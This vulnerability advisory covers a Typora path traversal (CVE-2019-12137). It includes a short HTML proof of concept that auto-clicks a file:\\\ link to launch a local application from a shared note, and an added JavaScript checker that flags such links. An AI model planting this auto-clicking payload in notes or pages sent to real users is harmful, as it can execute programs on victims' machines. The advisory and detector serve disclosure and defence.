Typora path traversal vulnerability

Vulnerability ID: 1612673; Vulnerability type: Path traversal
Published: 2019-05-29; Updated: 2019-05-29
CVE ID: CVE-2019-12137; CNNVD-ID: CNNVD-201905-722
Affected platform: N/A; CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019050297
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201905-722
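|Vulnerability details
Typora is an editor. A directory traversal vulnerability exists in Typora version 0.9.9.24.6 (macOS). The vulnerability stems from a network system or product failing to properly filter special elements in resource or file paths. An attacker can exploit it to access locations outside the restricted directory.
|Exploit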
# Exploit Title: Code execution via path traversal
# Date: 17-05-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://typora.io
# Software Link: https://typora.io/download/Typora.dmg
# Version: 0.9.9.24.6
# Tested on: macOS Mojave v10.14.4
# CVE: CVE-2019-12137
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
# https://github.com/typora/typora-issues/issues/2505

Summary:
Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of
arbitrary programs, via a file:/// or ../ substring in a shared note via
abusing URI schemes.

Technical observation:
A crafted URI can be used in a note to perform this attack using file:///
as an argument or by traversing to any directory like
(../../../../something.app).

Since Typora also has a feature for sharing notes, in such a case an attacker
could leverage this vulnerability and send crafted notes to the
victim to perform any further attack.

Simple exploit code would be:

<body>
<a href="file:\\\Applications\Calculator.app" id=inputzero>
  <img src="someimage.jpeg" alt="inputzero" width="104" height="142">
</a>
<script>
(function download() {
    document.getElementById('inputzero').click();
})()
</script>
</body>
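
A defensive check for the two link forms the advisory describes (a `file:` URI and a `../` traversal), added here as an example and not taken from the advisory or from Typora's code. The scheme allowlist, the verdict strings and the function names are assumptions of this sketch; the sample note is constructed.

```javascript
// Added example (not from the advisory); ALLOWED_SCHEMES and verdicts are assumed.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function classifyHref(raw) {
  // Drop control characters and spaces, and treat "\" as "/", so that
  // "file:\\\Applications" and " FILE:///..." classify the same way.
  const href = raw.replace(/[\u0000-\u0020]/g, '').replace(/\\/g, '/');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  if (scheme) {
    const name = scheme[1].toLowerCase();
    return ALLOWED_SCHEMES.has(name) ? 'allow' : `block:scheme:${name}`;
  }
  // Relative reference: decode percent-escapes once, then inspect segments.
  let path;
  try {
    path = decodeURIComponent(href).replace(/\\/g, '/');
  } catch (err) {
    return 'block:bad-encoding';
  }
  if (path.startsWith('/')) return 'block:absolute-path';
  if (path.split('/').includes('..')) return 'block:traversal';
  return 'allow';
}

function auditNote(text) {
  const patterns = [
    /\b(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi, // HTML attributes
    /\]\(\s*<?([^)\s>]+)/g, // Markdown [text](target)
  ];
  const findings = [];
  for (const re of patterns) {
    for (const m of text.matchAll(re)) {
      const target = m[1] ?? m[2] ?? m[3];
      const verdict = classifyHref(target);
      if (verdict !== 'allow') findings.push({ target, verdict });
    }
  }
  return findings;
}

// Constructed sample note using the link forms quoted in the advisory.
const SAMPLE_NOTE = [
  '<a href="file:\\\\\\Applications\\Calculator.app" id=inputzero>',
  '  <img src="someimage.jpeg" alt="inputzero">',
  '</a>',
  '[report](../../../../something.app)',
  '[docs](https://typora.io)',
].join('\n');
console.log(auditNote(SAMPLE_NOTE));
```

Run over a received note before it is opened, `auditNote` returns one finding per blocked target; an empty array means every link uses an allowed scheme or a relative path with no parent-directory segment.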
|References

Source: github.com
Link: https://github.com/typora/typora-issues/issues/2505

Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-12137